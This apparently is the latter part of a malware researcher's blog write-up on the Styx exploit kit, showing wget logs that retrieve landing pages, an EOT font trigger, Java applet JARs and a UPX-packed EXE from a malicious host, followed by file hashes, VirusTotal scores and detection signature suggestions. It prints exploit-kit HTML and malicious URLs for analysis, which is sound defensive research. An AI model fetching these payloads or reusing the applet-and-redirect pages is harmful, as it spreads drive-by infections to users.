  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=5366735656365663830336530343464373133666562353636643234693561343; path=/
  X-Mode: HTML 
  X-Powered-By: ASP.NET version 4
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 354
Length: 354 [text/html]
Saving to: `fnts.html'
  
     0K                                                       100% 5.23M=0s
  
2013-04-06  (5.23 MB/s) - `fnts.html' saved [354/354]



<html>
<head>
<title>Pbksidiadqagem</title>
</head>
<style>@font-face{src:url('PjNmvEsWb.eot');font-family:'p1';}#StbxuMAxj{font-size:5px;line-height:normal;font-family:'p1';position:absolute;top:0px;left:0px;}</style>
<body onload="try{window.focus();}catch(e){}">
<div style="top:0px;position:absolute;left:0px;" id="StbxuMAxj">:)</div>
</body>
</html>



Lets go and fetch the EOT right away:

--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/PjNmvEsWb.eot
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=1693234323166326033336933653937363137393637366661653466673736356; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 4320
Length: 4320 (4.2K) [text/html]
Saving to: `PjNmvEsWb.eot'

     0K ....                                                  100%  120M=0s

2013-04-06 (120 MB/s) - `PjNmvEsWb.eot' saved [4320/4320]



And the last action from the Plugin Detector: jovf.html
PS2: once again we need to start at the landing pane to avoid 402's

--2013-04-07 --  http: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/jovf.html
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=8326564323361343631346469316133373133653335613233326433323637353; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 335
Length: 335 [text/html]
Saving to: `jovf.html'

     0K                                                       100% 16.9M=0s

2013-04-07 (16.9 MB/s) - `jovf.html' saved [335/335]



<html>
<head>
<title>Ymqdiaqbwcgvvze</title>
</head>
<body>
<applet archive="cCJVRwhSC.jar" code="YoHmO">
<param name="sfPsrI" value="&h=12"/>
</applet>
<script>
try{
    document.applets[0].lKvIr("");
} catch(err){};
var UJZhmKT="";
if(UJZhmKT!="")
    setTimeout("window.top.location.href = UJZhmKT", 5000);
</script>
</body>
</html>



Aha - another JAR lets pick it up:

--2013-04-07 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/cCJVRwhSC.jar
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=2603138343133346031363230316537356032656431343634323466353439316; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 7343
Length: 7343 (7.2K) [text/html]
Saving to: `cCJVRwhSC.jar'

     0K .......                                               100% 3.21M=0.002s

2013-04-07 (3.21 MB/s) - `cCJVRwhSC.jar' saved [7343/7343]



Phew - lots of good stuff in this kit. lets see if we can bring it all home accross the river.

6. fetching the JAR 

From the gate/landing pane we got first we need to get the jar.


2013-04-06 (24.6 MB/s) - `pane.html' saved [482/482]

--2013-04-06 --  hxxp: //rupscare.org/eNLShv0OTec0p3C402mlb0ZrKE0d9420eFIA16FxJ0kSCu0VXk/IriBA.jar
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Content-Type: text/html;charset=utf-8
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=1673931303664613336326534616932613832323469323531643463393431643; path=/
  X-Mode: HTML
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 11678
Length: 11678 (11K) [text/html]
Saving to: `IriBA.jar'

     0K .......... .                                          100% 12.4M=0.001s

2013-04-06  (12.4 MB/s) - `IriBA.jar' saved [11678/11678]

Hopfully I get the time to look more into the JAR some other day...

7.Grabbing the EXE 

Since the exe file was up for grabs in the landing pane not much work needed

--2013-04-06 --  hxxp: //rupscare.org/zNUdi611VKX0IDkq01jcK0dBBK0Q58F0rlJQ0HCzj0CaX90rFSv0076B01qoF05Oka0sF6F0xPVY16jTn17bNp0odl10d0TL0629S0F84i0FHxP0wT6105b9D0FEWS0Kr4U0swQx0ZdqR0Dw0B0wCUu0ZkH50rXuR0Uc7v0skdD0MhrU15SwC0iNDa0iOGF0HCX113Tui/xMCOakDS1p.exe?gO=aTtOki&h=11
Resolving rupscare.org... 5.45.183.91
Connecting to rupscare.org|5.45.183.91|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Cache-Control: no-cache, must-revalidate
  Content-Disposition: attachment; filename="RivcgrcunV.exe"
  Content-Transfer-Encoding: binary
  Content-Type: application/octet-stream; charset=binary
  Expires: Mon, 26 Jul 1997 05:00:00 GMT
  Last-Modified: Fri, 05 Apr 2013 12:02:17 GMT
  Pragma: no-cache
  Server: nginx/0.7.64
  Set-Cookie: PHPSESSID=1346367346035326430356463336462623734656164346233643164343732366; path=/
  X-Mode: RAW
  X-Powered-By: ASP.NET version 4
  Content-Encoding: gzip
  X-Powered-By: HPHP
  Connection: keep-alive
  Content-Length: 209409
Length: 209409 (205K) [application/octet-stream]
Saving to: `xMCOakDS1p.exe'

     0K .......... .......... .......... .......... .......... 24%  549K 0s
    50K .......... .......... .......... .......... .......... 48%  537K 0s
   100K .......... .......... .......... .......... .......... 73% 1000K 0s
   150K .......... .......... .......... .......... .......... 97% 1.05M 0s
   200K ....                                                  100%  139K=0.3s

2013-04-06 (654 KB/s) - `xMCOakDS1p.exe' saved [209409/209409]



No obfuscation, packeted with UPX though. Guess thats why it would not run in my VM. Exe analysis is not my game, so I leave that to others.

8. quick analysis

PDF1:
MD5: 95ca89b073d80dc7468d5919bb41c8c8
VT: 7/46

PDF2:
MD5: 3dff91a1ec7615e93f783eb66a5d97c5
VT: 9/46

JAR1:
MD5: e31e17abf678d2a05e68db9f6c2b3ac8
VT: 6/45

JAR2:
MD5: 2f95a9b361ab622e9616472ae57e3bb3
VT: 4/46

EOT:
MD5: fc67300a7ec85a41eb9836925816fa74
VT:1/46

EXE:
MD5: 376bee885c5af20f067bbbb073863d8d
VT: 20/46

9. Styx seen with Wireshark

landing pane



redirect to plugin detect



exe download



10. Detection

Looks like the signature proposals over @malwaresigs are pretty good. But a slight change was seen to what @kafeine reported on 1 static links in the pdfx.html file:
jovf.html - changed from ie78xp.hmtl

add jovf.html to detect the change or add jovf.html and fnts.html.

11. Epilogue

That went well. We made it to the underworld and back with most of the goods we headed out to steal.
Lots of fun stuff for further processing here. Most seem old though. I might try to up my skills on some PDF analysis and more JAR analysis some other day. 

Always good to have something waiting in case one get bored one day and/or want to learn some more...


Happy river crossing to the underworld for malware theft :)

Other Styx references:
@kafeine. EK master, on Styx

Pattern change reported by @Malwarebiopsy 

1 comment:

  1. Great job Brother learned some good stuff from this and enjoyed!

    ReplyDelete